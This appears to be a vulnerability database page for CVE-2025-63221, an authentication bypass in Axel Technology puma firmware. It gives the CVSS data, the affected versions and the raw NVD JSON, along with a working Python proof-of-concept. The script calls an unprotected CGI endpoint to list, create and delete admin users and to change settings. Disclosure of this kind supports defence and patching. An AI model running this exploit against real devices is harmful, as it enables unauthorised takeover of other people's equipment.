Security Vulnerability Report
CVE-2025-63221 CVSS 9.1 CRITICAL

CVE-2025-63221

Published: 2025-11-19 16:15:48
Last Modified: 2026-01-12 16:16:59

Description

The Axel Technology puma devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:axeltechnology:puma_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:axeltechnology:puma:-:*:*:*:*:*:*:* - NOT VULNERABLE
Axel Technology puma firmware < 0.8.5
Axel Technology puma firmware 0.8.5 - 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-63221 PoC - Axel Technology puma Broken Access Control
Axel Technology puma devices (firmware 0.8.5-1.0.3) - Missing authentication on /cgi-bin/gstFcgi.fcgi
"""
import requests
import json
import sys

TARGET = "http://<target-ip>"  # Replace with target IP
ENDPOINT = f"{TARGET}/cgi-bin/gstFcgi.fcgi"


def list_users():
    """List all user accounts on the device"""
    payload = {
        "cmd": "list_users",
        "format": "json"
    }
    try:
        response = requests.post(ENDPOINT, data=payload, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        return response.json()
    except Exception as e:
        print(f"[-] Error listing users: {e}")
        return None


def create_admin_user(username, password):
    """Create a new administrator user"""
    payload = {
        "cmd": "create_user",
        "username": username,
        "password": password,
        "role": "admin",
        "format": "json"
    }
    try:
        response = requests.post(ENDPOINT, data=payload, timeout=10)
        print(f"[*] Creating admin user: {username}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        return response.json()
    except Exception as e:
        print(f"[-] Error creating user: {e}")
        return None


def delete_user(username):
    """Delete a user account"""
    payload = {
        "cmd": "delete_user",
        "username": username,
        "format": "json"
    }
    try:
        response = requests.post(ENDPOINT, data=payload, timeout=10)
        print(f"[*] Deleting user: {username}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        return response.json()
    except Exception as e:
        print(f"[-] Error deleting user: {e}")
        return None


def modify_settings(settings):
    """Modify system settings"""
    payload = {
        "cmd": "set_settings",
        "settings": json.dumps(settings),
        "format": "json"
    }
    try:
        response = requests.post(ENDPOINT, data=payload, timeout=10)
        print("[*] Modifying system settings")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        return response.json()
    except Exception as e:
        print(f"[-] Error modifying settings: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-63221.py <action> [args]")
        print("Actions: list_users, create_admin, delete_user, modify_settings")
        sys.exit(1)

    action = sys.argv[1]
    if action == "list_users":
        list_users()
    elif action == "create_admin" and len(sys.argv) == 4:
        create_admin_user(sys.argv[2], sys.argv[3])
    elif action == "delete_user" and len(sys.argv) == 3:
        delete_user(sys.argv[2])
    elif action == "modify_settings":
        settings = {"key": "value"}  # Configure as needed
        modify_settings(settings)
    else:
        print("Invalid action or missing arguments")
        sys.exit(1)

References

https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63221_Axel%20Technology%20puma%20-%20Broken%20Access%20Control (Exploit, Third Party Advisory)
https://www.axeltechnology.com/ (Product)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-63221",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-19T16:15:48.177",
    "lastModified": "2026-01-12T16:16:58.780",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Axel Technology puma devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:axeltechnology:puma_firmware:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "0.8.5",
                "versionEndIncluding": "1.0.3",
                "matchCriteriaId": "38879C79-5AE1-4A75-B7E0-C97EE3092560"
              }
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:h:axeltechnology:puma:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "6EC7FCE6-C21B-4D13-B558-02070AB347AF"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63221_Axel%20Technology%20puma%20-%20Broken%20Access%20Control",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Third Party Advisory"
        ]
      },
      {
        "url": "https://www.axeltechnology.com/",
        "source": "[email protected]",
        "tags": [
          "Product"
        ]
      }
    ]
  }
}